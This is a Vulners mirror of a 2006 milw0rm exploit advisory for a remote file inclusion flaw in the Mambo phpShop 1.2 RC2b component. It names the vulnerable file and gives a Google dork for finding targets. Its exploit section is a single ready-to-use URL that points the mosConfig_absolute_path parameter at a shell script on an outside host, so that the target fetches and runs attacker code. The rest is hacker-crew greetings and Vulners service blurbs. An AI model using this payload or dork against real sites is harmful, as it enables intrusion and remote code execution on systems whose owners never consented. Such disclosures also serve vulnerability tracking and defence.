Vulners
Lucene search
Mambo Component 'com_phpshop' 1.2 RC2b - Remote File Inclusion
Affected Application: Mambo phpShop v1.2 RC2b
(Mambo CMS Component)
. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
Discoverd/Found by: Charles Nelwan a.k.a Cmaster4
Team: BatamHacker irc.dal.net crew
URL: http://www.batamhacker.info/forum
E-Mail: [email protected]
. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .
Typ: Remote [x] Local [ ]
Remote File Inclusion [x] SQL Injection [ ]
Level: Low [ ] Middle [x] High [ ]
Application: Mambo phpShop
Version: 1.2 RC2b
Vulnerable File: toolbar.phpshop.html.ph
URL: http://www.mambo-phpshop.net or http://www.mamboportal.com/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=category&filecatid=1054
Description: phpShop component for Mambo. A fully featured shop component with IPN support, categories, userhandling, etc.
inurl:"com_phpshop"
. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
http://www.targer.com/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://Senjata.com/tembuspakeshell.txt
Shoutz:
~~~~~~
~ Special Greetz To My BATAMHACKER CREW ON IRC.DAL.NET h4ntu, havicaz, baylaw
~ To All Indonesian Underground Hacker
# milw0rm.com [2006-08-17]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Aug 2006 00:00Current
7.4High risk
Vulners AI Score7.4